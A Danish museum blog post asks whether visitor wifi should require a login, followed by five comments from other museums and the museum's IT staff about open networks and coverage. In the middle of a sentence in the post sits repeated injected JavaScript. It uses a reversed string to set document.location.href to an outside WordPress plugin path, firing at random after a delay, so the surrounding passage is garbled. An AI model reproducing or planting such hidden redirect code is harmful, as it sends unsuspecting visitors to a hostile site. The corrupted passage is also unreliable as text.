Fri Wifi til publikum?

Formidling på mobile platform breder sig hastigt i museumsverdenen. Det samme gør publikums forventning om, at kunne få netadgang til deres smartphones og tablets via wifi. Efterhånden er det lige så selvfølgeligt, at der er wifi i udstillingerne, som at der er kaffe i cafeen.

På Nationalmuseet har vi wifi i dele af udstillingsarealet, herunder i Egmonthallen, vores særudstillingslokale, og i den netoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top åbnede særudstilling ”Europa møder Verden” gør vi flittigt brug af mobil formidling.

Desværre mødes brugerne med et krav om, at de skal logge ind, for at få adgang til vores gæste-wifi. Det skal ske med en kode, som man kan få i forhallen. Det er naturligvis besværligt, og afholder muligvis nogle fra at benytte den mobile formidling.

Kravet om adgangskode begrundes med den såkaldte ”logningsbekendtgørelse”, der som en del af terrorbekæmpelsen pålægger netudbydere at kunne gøre rede for, hvem der har haft adgang til deres net. Det fremgår imidlertid af vejledningen til bekendtgørelsen, at ”ikke-kommercielle” institutioner som biblioteker, skoler, hospitaler mv. er undtaget fra denne lognings-pligt.

Jeg har derfor foreslået, at vi fjernet kravet om adgangskode til vores gæste-wifi.

Til brug for vores interne diskussion om dette, ville det være meget nyttigt at vide, hvordan I på andre museer håndterer problematikken. Har I wifi til jeres publikum? Kræver I log-in? Skriv meget gerne en kommentar!

På forhånd tak

Lars

5 comments to “Fri Wifi til publikum?”
  1. Vi sidder i præcis de samme overvejelser her på Vikingeskibsmuseet, lige nu har vi et lukket net hvor folk kan komme på hvis de spørg pænt, lidt ligesom jer, men det vi overvejer er, at gøre det frit med nogle begrænsninger i de porte folk kan komme på og at sætte et ret kras filter i vores firewall, så vi forhåbentligt får luget ud i alt for meget spil, porno mv. sites. Der ud over skal der være et net parallelt som medarbejderne kan bruge (de skal bruge deres standard login), hvor de kan have adgang til deres interne tjenester, og sidst men ikke mindst vil vi prøve at lave det sådan at når man logger sig på netværket så er den første side man kommer ind på er museets med info, nyheder mv.
    Lige nu arbejder jeg mest med at få dækket museet ordentligt, hvilket heller ikke er helt nemt.

  2. Et godt argument mod at fjerne login og adgangskode må være de mange store museer i London, der tilbyder gratis og åben wifi. Hvis det kan lade sig gøre i det terrorforskrækkede UK, burde det også være muligt herhjemme.

    Når man tilmed ikke behøver at gøre andet end at få en lap papir med login og kodeord og det ikke samkøres med en anden registrering, har jeg svært ved at se hvordan det øger sikkerheden. At vide at det var bruger XY219, der sendte en bombeopskrift af sted under besøg i møntsamlingen hjælper næppe efterforskere særligt meget.

    Held og lykke med dit ædle forslag 🙂

  3. På Danmarks Tekniske Museum har vi nu i over et år haft et 100 procent åbent WIFI til publikum, hvor vores gæster logger på uden adgangskode. Det har ikke voldt nogle problemer, ud over stabilitet i visse perioder. De fleste biblioteker har efterhånden også denne service med frit tilgængeligt WIFI.

  4. Tak for kommentarer og gode argumenter. Til min glædelige overraskelse er der allerede skred i sagen hos os, så jeg håber vi snart kan tilbyde publikum wifi uden generende og ulogiske krav om adgangskoder.

    MVH Lars

  5. Kære Alle
    I forbindelse med vores WiFi tilbud er der i de områder der er dækket af WiFi nu åbnet for et gratis netværk: NM_OPEN_GUEST der ikke beder om nogen form for login.
    Der er dog andre begrænsninger på dette net, f.eks. er det ikke muligt at anvende nogen former for VPN opkobling. Der skal man stadig henvende sig i Skranken for at få en bon med login til NATMUS_GUEST. Og det bliver der ikke ændret på.
    De services der stilles tilrådighed på NM_OPEN_GUEST er HTTP: – som er almindelig webtrafik der kan ses i en browser som f.eks. Internet Explorer – og HTTPS: som er krypteret WEBtrafik der er krypteret webtrafik, der ses i en browser, som f.eks Internet Explorer.

    Fra IT’s side arbejder vi med at udbygge vores WiFi tilbud, mere kan jeg ikke sige nu.
    Hvis man er interesseret i hvor der er dækning i Prinsens Palæ så er det i forhallen, Egmomthallen, Festsalen og U9 samt Guldbergsalen. Der ud over er der dækning i nogle af vores kontorområder.
    Der er delvis dækning på Frihedsmuseet, Kongernes Jelling samt Brede Værk. På Frilandsmuseet er der delvis dækning i Hovedbygningen, omkring Landbrugsskolen, Stadager Brugs og på Fjellerup Østergård.

    Håber dette er med til at afmystificere Nationalmuseets WiFi tilbud

    MVH
    Knud

Skriv et svar